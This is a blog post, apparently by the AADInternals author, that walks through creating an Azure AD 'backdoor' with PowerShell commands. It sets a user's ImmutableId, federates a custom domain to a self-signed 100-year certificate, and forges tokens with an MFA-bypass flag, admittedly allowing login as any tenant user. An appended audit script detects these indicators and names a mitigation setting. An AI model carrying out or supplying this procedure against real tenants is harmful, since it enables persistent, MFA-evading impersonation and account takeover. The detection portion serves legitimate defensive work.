This Monday Azure AD MFA was down over 12 hours preventing users from logging in to Office 365. As MFA is usually mandatory for administrators by company policy, they couldn’t log in either. In this blog, I’ll show how to create a backdoor to Azure AD so you can log in and bypass MFA.
Microsoft has pushed organisations to use Azure AD Multi-Factor Authentication (MFA) to increase the security of their cloud offering. This Monday the MFA service was down worldwide for over 12 hours.
How can admins log in if something similar happens? The answer is: using a backdoor. Here is how to create one.
Note! In this blog, I’m using the AADInternals PowerShell module.
The backdoor utilises a known identity federation "vulnerability" (a feature, depending on whom you ask) that I blogged about a year ago. To create a backdoor, you need:
- An admin user
- A custom domain
- An X.509 certificate
- An identity provider
An admin user
Naturally, the first thing you need is an administrator account. The backdoor requires that the account has the ImmutableId attribute set. If the account is synced from on-premises, the attribute contains the base64-encoded GUID of the user's on-prem AD object. If the account is not synced, you need to set it manually. The value can be basically any string, as long as it is unique within the tenant.
To set the ImmutableId, use the following commands:
# Get AccessToken
Get-AADIntAccessTokenForAADGraph
# Set the ImmutableId
Set-AADIntUser -UserPrincipalName "firstname.lastname@example.org" -ImmutableId "AADBackdoor"
A custom domain
Next, you need a custom domain which can be converted to Federated. You can get one for free from www.myo365.site.
A certificate
The next thing you need is a certificate. In Windows 10, you can easily create a self-signed certificate with PowerShell. If you are running an older OS, you can use MakeCert.exe or OpenSSL to create the certificate.
You can also create a certificate online, but such certificates are generated by a third party and should NEVER be used in production.
Create a certificate with the following PowerShell commands:
# Create a new self-signed certificate and add it to your personal store
$cert = New-SelfSignedCertificate -DnsName "backdoor.company.com" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter (Get-Date).AddYears(100)
# Save the password to a variable
$certPwd = ConvertTo-SecureString -String "password" -Force -AsPlainText
# Export the certificate to a .pfx file
Export-PfxCertificate -Cert $cert -FilePath "c:\mycert.pfx" -Password $certPwd
# Remove the certificate from the personal store
Remove-Item "cert:\CurrentUser\my\$($cert.Thumbprint)"
An identity provider
The last thing you need is an identity provider. In this blog, I use the AADInternals PowerShell module, but any IdP supporting the WS-Federation protocol can be used, such as ADFS.
Create the backdoor
To create the backdoor, you need to set the authentication parameters of the chosen domain to match the IdP. For this, you need an Azure-wide unique issuer and the public key of the certificate.
# Extract the public key
$publicKey = [Convert]::ToBase64String($cert.Export("cert"))
# Set the issuer and login / logoff uri
$uri="http://backdoor.company.com/"
# Set the domain authentication info
Set-AADIntDomainAuthentication -DomainName "backdoor.company.com" -Authentication Federated -IssuerUri $uri -PassiveLogOnUri $uri -LogOffUri $uri -SigningCertificate $publicKey
And that’s it, the backdoor is created and you’re ready to open it!
# Load the certificate from the .pfx file
$signingCert=Get-AADIntCertificate -FileName "c:\mycert.pfx" -Password "password"
# Create an HTML page and open it in an Internet Explorer InPrivate session
Open-AADIntOffice365Portal -ImmutableId "AADBackdoor" -Issuer "http://backdoor.company.com" -Certificate $signingCert -ByPassMFA $true
You should now see the HTML page as below. Click the Login to Office 365 button to log in! You can also view the source code of the page to see what the SAML token contains.
Now you have a backdoor which you can use to access Office 365, even if the MFA service is down. Conditional Access may still block the access for other reasons.
Note! The backdoor allows you to log in as ANY USER of the tenant, as long as the user’s ImmutableId is known. So keep the certificate protected and safe!
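The same federation settings that make the backdoor work are also what an administrator can audit to find one. The script below is an added example and is not part of the original post or of AADInternals; it uses the MSOnline module cmdlets Get-MsolDomain, Get-MsolDomainFederationSettings and Get-MsolUser (run Connect-MsolService first) and flags the indicators left behind by the procedure above: a federated domain whose issuer URI is not one of your known IdPs, a self-signed or very long-lived token-signing certificate, and a cloud-only user carrying a manually set ImmutableId. The issuer allow-list and the maximum tolerated certificate lifetime are assumptions you must replace with your own values.

```powershell
# Added audit example (not part of the original post or AADInternals).
# Requires the MSOnline module and an authenticated session: Connect-MsolService
# Assumption: $ExpectedIssuers lists the issuer URIs of your legitimate IdPs (placeholder value below).
$ExpectedIssuers = @("http://adfs.company.example/adfs/services/trust")
$MaxCertYears    = 5   # assumption: a token-signing certificate valid longer than this is worth a look

$findings = @()

# 1. Every federated domain: which issuer is trusted to sign tokens, and with what certificate?
foreach ($domain in (Get-MsolDomain | Where-Object { $_.Authentication -eq "Federated" })) {
    $fed = Get-MsolDomainFederationSettings -DomainName $domain.Name

    if ($ExpectedIssuers -notcontains $fed.IssuerUri) {
        $findings += [pscustomobject]@{ Object = $domain.Name; Check = "UnknownIssuer"; Detail = $fed.IssuerUri }
    }

    # Both the current and the staged next certificate are base64 DER blobs
    foreach ($b64 in @($fed.SigningCertificate, $fed.NextSigningCertificate) | Where-Object { $_ }) {
        $cert  = [System.Security.Cryptography.X509Certificates.X509Certificate2]::new([Convert]::FromBase64String($b64))
        $years = ($cert.NotAfter - $cert.NotBefore).TotalDays / 365

        if ($cert.Subject -eq $cert.Issuer) {
            $findings += [pscustomobject]@{ Object = $domain.Name; Check = "SelfSignedSigningCert"; Detail = $cert.Subject }
        }
        if ($years -gt $MaxCertYears) {
            $findings += [pscustomobject]@{ Object = $domain.Name; Check = "LongLivedSigningCert"
                                             Detail = ("{0:N0} years, thumbprint {1}" -f $years, $cert.Thumbprint) }
        }
    }
}

# 2. Cloud-only users with an ImmutableId. A user synced from on-premises always has
#    LastDirSyncTime populated, so an ImmutableId without it was set by hand.
Get-MsolUser -All | Where-Object { $_.ImmutableId -and -not $_.LastDirSyncTime } | ForEach-Object {
    $findings += [pscustomobject]@{ Object = $_.UserPrincipalName; Check = "ImmutableIdOnCloudOnlyUser"; Detail = $_.ImmutableId }
}

$findings | Format-Table -AutoSize
```

Two caveats when reading the output: a tenant that once ran directory synchronisation and later turned it off keeps the old ImmutableId values on now cloud-only users, so the second check needs a quick cross-check against that history, and the certificate checks only catch the lazy variant (self-signed, 100-year lifetime); a carefully issued certificate is caught only by the issuer allow-list, which is the check to keep. Since the post was written, Microsoft has also added a per-domain federatedIdpMfaBehavior setting in the Graph API (value rejectMfaByFederatedIdp), which makes the cloud enforce its own MFA regardless of what the federated token claims and therefore closes the -ByPassMFA path shown above.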